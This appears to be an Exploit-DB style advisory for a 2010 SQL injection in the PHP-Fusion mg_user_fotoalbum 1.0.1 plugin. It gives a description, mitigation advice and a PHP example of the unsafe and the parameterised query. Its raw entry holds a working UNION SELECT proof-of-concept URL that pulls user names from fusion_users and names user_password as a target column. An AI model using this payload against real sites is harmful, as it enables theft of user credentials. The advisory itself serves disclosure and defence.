Vendor: mg_user_fotoalbum
By: Easy Laster
CVSS: 7,5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: mg_user_fotoalbum
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:php-fusion:mg_user_fotoalbum:1.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2010

PHP-Fusion mg user fotoalbum 1.0.1 <= SQL injection Vulnerability Proof of Concept

A SQL injection vulnerability exists in PHP-Fusion mg user fotoalbum 1.0.1. The 'mg_user_fotoalbum.php' script does not sufficiently sanitize the user-supplied 'album_user_id' and 'album_id' parameters before using them in a database query, so a specially crafted HTTP request carrying SQL fragments in these parameters is executed by the database. Successful exploitation gives an attacker unauthorized access to sensitive information stored in the database.

Mitigation:

Validate untrusted input before it is used to build any SQL statement, so that request parameters never reach the database as raw query text. It is also recommended to access the database through stored procedures rather than dynamic SQL statements.
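As an added illustration (not code from mg_user_fotoalbum or PHP-Fusion), the weak pattern the advisory describes beside a hardened handler: the ids are validated as integers and then bound with PDO placeholders. The table and column names (fusion_mg_album, album_title) are assumptions made for this example.

```php
<?php
// Added example (not code from mg_user_fotoalbum or PHP-Fusion): the weak
// pattern the advisory describes, beside a hardened handler. Table and
// column names are assumptions made for illustration.

// Weak: both parameters are spliced into the SQL text. An album_id such as
// "' union select ..." closes the string literal and the rest becomes SQL.
function build_album_query_unsafe(array $get): string
{
    $user  = $get['album_user_id'] ?? '';
    $album = $get['album_id'] ?? '';
    return "SELECT album_title FROM fusion_mg_album "
         . "WHERE album_user_id='$user' AND album_id='$album'";
}

// Hardened step 1: the ids are expected to be integers, so reject anything
// that is not a short run of digits before it goes near SQL (null = reject).
function parse_id(array $get, string $name): ?int
{
    $raw = $get[$name] ?? '';
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 10) {
        return null;
    }
    return (int) $raw;
}

// Hardened step 2: even validated values are bound, never concatenated.
// The query text is fixed at prepare time, so input cannot reshape it.
function fetch_album_title(PDO $db, array $get): ?string
{
    $user  = parse_id($get, 'album_user_id');
    $album = parse_id($get, 'album_id');
    if ($user === null || $album === null) {
        return null; // caller answers 400 and logs the rejected request
    }
    $stmt = $db->prepare(
        'SELECT album_title FROM fusion_mg_album WHERE album_user_id = :u AND album_id = :a'
    );
    $stmt->execute([':u' => $user, ':a' => $album]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['album_title'] : null;
}

// Constructed request shaped like the advisory's parameters (not a real capture).
$constructed = ['album_user_id' => '251', 'album_id' => "' union select 1--"];
echo build_album_query_unsafe($constructed), "\n"; // the payload ends up inside the SQL
var_dump(parse_id($constructed, 'album_id'));      // NULL: rejected before any query runs
```

With PDO, set PDO::ATTR_EMULATE_PREPARES to false on the connection so the MySQL server, not the client library, performs the binding.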

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : PHP-Fusion mg user fotoalbum 1.0.1 <=  SQL injection Vulnerability Proof of Concept
+Author : Easy Laster
+Date   : 10.10.2010
+Script  : PHP-Fusion mg user fotoalbum 1.0.1
+Download : http://phpfusion.marcusg.de/downloads.php?page_id=67
+Price : free
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents and free-hack.com
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco,
 
---------------------------------------------------------------------------------------
                                                                                      
 ___ ___ ___ ___                         _ _           _____           _         _  
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_| 
                                              |___|                 |___|           
 
 
----------------------------------------------------------------------------------------
+Proof of Concept
+Table : fusion_users
+columns : user_password, user_name
+Proof of Concept : http://www.site.com/infusions/mg_user_fotoalbum_panel/mg_user_fotoalbum.php?album_user_id=251&album_id=%27+union+select+1,2,3,4,user_name,6,7,8,9,10,11+from+fusion_users+where+user_id=1--+
----------------------------------------------------------------------------------------